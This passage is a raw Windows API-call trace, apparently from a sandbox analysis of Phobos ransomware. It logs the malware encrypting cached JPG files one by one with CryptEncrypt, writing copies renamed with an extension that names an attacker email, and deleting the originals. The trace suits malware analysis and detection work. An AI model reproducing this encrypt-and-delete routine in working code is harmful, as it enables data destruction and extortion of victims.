Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeZnr[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeznr[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0179.452] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0179.452] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.452] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3a2a, lpOverlapped=0x0) returned 1 [0179.464] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3a30, dwBufLen=0x3a30 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3a30) returned 1 [0179.464] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3a30, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3a30, lpOverlapped=0x0) returned 1 [0179.465] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0179.465] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.465] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0179.465] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.465] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0179.465] CryptDestroyKey (hKey=0xa32d28) returned 1 [0179.465] CloseHandle (hObject=0x178) returned 1 [0179.465] CloseHandle (hObject=0x14c) returned 1 [0179.465] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeZnr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeznr[1].jpg")) returned 1 [0179.466] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0179.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfwtU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefwtu[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0179.472] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1926) returned 1 [0179.472] CloseHandle (hObject=0x134) returned 1 [0179.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfwtU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefwtu[1].jpg")) returned 0x2020 [0179.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfwtU[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefwtu[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfwtU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefwtu[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0179.473] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.473] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfwtU[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefwtu[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0179.473] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0179.473] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.473] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x786, lpOverlapped=0x0) returned 1 [0179.484] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x790, dwBufLen=0x790 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x790) returned 1 [0179.484] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x790, lpOverlapped=0x0) returned 1 [0179.485] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0179.485] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.485] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0179.485] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0179.485] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0179.485] CryptDestroyKey (hKey=0xa32c28) returned 1 [0179.485] CloseHandle (hObject=0x134) returned 1 [0179.486] CloseHandle (hObject=0x194) returned 1 [0179.486] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfwtU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefwtu[1].jpg")) returned 1 [0179.487] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0179.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgCuQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegcuq[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0179.488] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6552) returned 1 [0179.488] CloseHandle (hObject=0x194) returned 1 [0179.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgCuQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegcuq[1].jpg")) returned 0x2020 [0179.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgCuQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegcuq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgCuQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegcuq[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0179.489] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.489] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgCuQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegcuq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0179.489] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0179.489] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.489] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1998, lpOverlapped=0x0) returned 1 [0179.520] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x19a0, dwBufLen=0x19a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x19a0) returned 1 [0179.520] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x19a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x19a0, lpOverlapped=0x0) returned 1 [0179.521] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0179.521] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.521] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0179.521] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0179.522] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0179.522] CryptDestroyKey (hKey=0xa32c28) returned 1 [0179.522] CloseHandle (hObject=0x194) returned 1 [0179.522] CloseHandle (hObject=0x134) returned 1 [0179.522] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgCuQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegcuq[1].jpg")) returned 1 [0179.523] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0179.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[2].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0179.524] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=14479) returned 1 [0179.524] CloseHandle (hObject=0x134) returned 1 [0179.524] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[2].jpg")) returned 0x2020 [0179.524] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[2].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0179.524] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.524] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0179.525] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0179.525] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.525] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x388f, lpOverlapped=0x0) returned 1 [0179.544] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3890, dwBufLen=0x3890 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3890) returned 1 [0179.544] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3890, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3890, lpOverlapped=0x0) returned 1 [0179.545] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0179.545] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.545] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0179.545] CryptDestroyKey (hKey=0xa32d28) returned 1 [0179.545] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0179.546] CryptDestroyKey (hKey=0xa32c28) returned 1 [0179.546] CloseHandle (hObject=0x134) returned 1 [0179.546] CloseHandle (hObject=0x194) returned 1 [0179.546] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[2].jpg")) returned 1 [0179.547] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0179.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgLzV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeglzv[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0179.547] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2271) returned 1 [0179.547] CloseHandle (hObject=0x194) returned 1 [0179.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgLzV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeglzv[1].jpg")) returned 0x2020 [0179.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgLzV[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeglzv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgLzV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeglzv[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0179.547] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.547] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgLzV[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeglzv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0179.548] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0179.548] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.548] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8df, lpOverlapped=0x0) returned 1 [0179.588] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8e0, dwBufLen=0x8e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8e0) returned 1 [0179.588] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8e0, lpOverlapped=0x0) returned 1 [0179.589] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0179.589] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.589] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0179.589] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.589] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0179.590] CryptDestroyKey (hKey=0xa32c28) returned 1 [0179.590] CloseHandle (hObject=0x194) returned 1 [0179.590] CloseHandle (hObject=0x134) returned 1 [0179.590] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgLzV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeglzv[1].jpg")) returned 1 [0179.591] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0179.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet 